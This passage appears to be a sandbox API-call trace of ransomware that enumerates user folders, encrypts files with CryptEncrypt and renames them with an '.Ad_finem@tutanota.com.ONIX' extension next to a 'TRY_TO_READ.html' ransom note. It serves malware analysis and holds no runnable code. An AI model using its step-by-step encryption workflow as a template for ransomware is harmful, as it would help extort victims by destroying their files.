[0120.032] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0120.032] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0120.033] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies9c354ca09c354b444c.lock") returned 61 [0120.033] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0120.033] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.033] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.034] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1ae8 [0120.034] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0120.034] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b3d0 | out: hHeap=0x410000) returned 1 [0120.034] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d058 | out: hHeap=0x410000) returned 1 [0120.034] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32860770, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0120.034] CloseHandle (hObject=0x3cc) returned 1 [0120.034] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.034] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x3b, wMilliseconds=0x19f)) [0120.034] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0120.035] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0120.035] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0120.035] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop9c354ca09c354b444c.lock") returned 61 [0120.035] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0120.035] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.035] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.036] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0120.036] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0120.036] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b428 | out: hHeap=0x410000) returned 1 [0120.036] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cfb8 | out: hHeap=0x410000) returned 1 [0120.036] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48edb0 [0120.036] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.036] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.036] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.036] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.036] GetLastError () returned 0x0 [0120.036] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0120.036] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.036] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.036] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.036] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.036] GetLastError () returned 0x0 [0120.036] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8642250, ftCreationTime.dwHighDateTime=0x1d5d9f6, ftLastAccessTime.dwLowDateTime=0xd7eb4070, ftLastAccessTime.dwHighDateTime=0x1d5e416, ftLastWriteTime.dwLowDateTime=0xd7eb4070, ftLastWriteTime.dwHighDateTime=0x1d5e416, nFileSizeHigh=0x0, nFileSizeLow=0x13eb4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-SNN1hkz4OGl.avi", cAlternateFileName="-SNN1H~1.AVI")) returned 1 [0120.036] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.036] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.036] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.036] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.036] GetLastError () returned 0x0 [0120.036] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-SNN1hkz4OGl.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-snn1hkz4ogl.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.037] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.037] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x13eb4, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.037] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.037] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.038] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.038] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.038] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.038] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.038] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-SNN1hkz4OGl.avi", dwFileAttributes=0x80) returned 1 [0120.038] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-SNN1hkz4OGl.avi") returned 55 [0120.038] GetProcessHeap () returned 0x410000 [0120.038] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x460008 [0120.038] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-SNN1hkz4OGl.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-SNN1hkz4OGl.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-SNN1hkz4OGl.avi" [0120.038] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-SNN1hkz4OGl.avi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-SNN1hkz4OGl.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-SNN1hkz4OGl.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.038] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=81588) returned 1 [0120.038] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x13eb4 [0120.038] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.038] GetProcessHeap () returned 0x410000 [0120.039] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.039] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.039] WriteFile (in: hFile=0x4a4, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.041] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.042] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.043] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x13eb4) returned 0xf50048 [0120.044] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x13eb4) returned 0xf63f08 [0120.044] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.044] ReadFile (in: hFile=0x4a4, lpBuffer=0xf50048, nNumberOfBytesToRead=0x13eb4, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x13eb4, lpOverlapped=0x0) returned 1 [0120.046] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-81588, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.046] WriteFile (in: hFile=0x4a4, lpBuffer=0xf63f08*, nNumberOfBytesToWrite=0x13eb4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf63f08*, lpNumberOfBytesWritten=0x367f44c*=0x13eb4, lpOverlapped=0x0) returned 1 [0120.048] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0120.048] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf63f08 | out: hHeap=0x410000) returned 1 [0120.048] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x13eb4, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.048] CloseHandle (hObject=0x4a4) returned 1 [0120.049] GetProcessHeap () returned 0x410000 [0120.049] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.049] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-SNN1hkz4OGl.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-snn1hkz4ogl.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-SNN1hkz4OGl.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-snn1hkz4ogl.avi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.052] GetProcessHeap () returned 0x410000 [0120.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d858 | out: hHeap=0x410000) returned 1 [0120.052] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfff0a780, ftCreationTime.dwHighDateTime=0x1d5e688, ftLastAccessTime.dwLowDateTime=0xe00dd5e0, ftLastAccessTime.dwHighDateTime=0x1d5de0a, ftLastWriteTime.dwLowDateTime=0xe00dd5e0, ftLastWriteTime.dwHighDateTime=0x1d5de0a, nFileSizeHigh=0x0, nFileSizeLow=0xf9f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="05rZdiw.wav", cAlternateFileName="")) returned 1 [0120.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.052] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.052] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.052] GetLastError () returned 0x0 [0120.052] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\05rZdiw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\05rzdiw.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.053] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.053] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xf9f7, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.053] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.053] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.054] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.054] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.054] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.054] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.054] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\05rZdiw.wav", dwFileAttributes=0x80) returned 1 [0120.054] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\05rZdiw.wav") returned 50 [0120.054] GetProcessHeap () returned 0x410000 [0120.054] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd4) returned 0x460008 [0120.054] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\05rZdiw.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\05rZdiw.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\05rZdiw.wav" [0120.054] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\05rZdiw.wav", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\05rZdiw.wav.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\05rZdiw.wav.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.054] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=63991) returned 1 [0120.054] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xf9f7 [0120.054] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.054] GetProcessHeap () returned 0x410000 [0120.054] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.054] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.056] WriteFile (in: hFile=0x4a4, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.057] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.058] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.059] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf9f7) returned 0x4d8b68 [0120.059] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf9f7) returned 0xf50048 [0120.060] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.060] ReadFile (in: hFile=0x4a4, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0xf9f7, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0xf9f7, lpOverlapped=0x0) returned 1 [0120.062] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-63991, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.062] WriteFile (in: hFile=0x4a4, lpBuffer=0xf50048*, nNumberOfBytesToWrite=0xf9f7, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesWritten=0x367f44c*=0xf9f7, lpOverlapped=0x0) returned 1 [0120.064] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0120.064] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0120.064] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xf9f7, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.064] CloseHandle (hObject=0x4a4) returned 1 [0120.065] GetProcessHeap () returned 0x410000 [0120.065] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.065] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\05rZdiw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\05rzdiw.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\05rZdiw.wav.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\05rzdiw.wav.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.068] GetProcessHeap () returned 0x410000 [0120.068] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.068] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.068] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.068] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d858 | out: hHeap=0x410000) returned 1 [0120.068] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf731d2f0, ftCreationTime.dwHighDateTime=0x1d5da89, ftLastAccessTime.dwLowDateTime=0x3e10b910, ftLastAccessTime.dwHighDateTime=0x1d5dc52, ftLastWriteTime.dwLowDateTime=0x3e10b910, ftLastWriteTime.dwHighDateTime=0x1d5dc52, nFileSizeHigh=0x0, nFileSizeLow=0x1408c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0ysD_efg7c4bcP.flv", cAlternateFileName="0YSD_E~1.FLV")) returned 1 [0120.068] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.068] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.068] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.068] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.068] GetLastError () returned 0x0 [0120.068] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0ysD_efg7c4bcP.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0ysd_efg7c4bcp.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.068] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.068] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1408c, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.068] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.069] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.069] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.069] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.069] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.070] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.070] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0ysD_efg7c4bcP.flv", dwFileAttributes=0x80) returned 1 [0120.070] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0ysD_efg7c4bcP.flv") returned 57 [0120.070] GetProcessHeap () returned 0x410000 [0120.070] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe2) returned 0x460008 [0120.070] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS 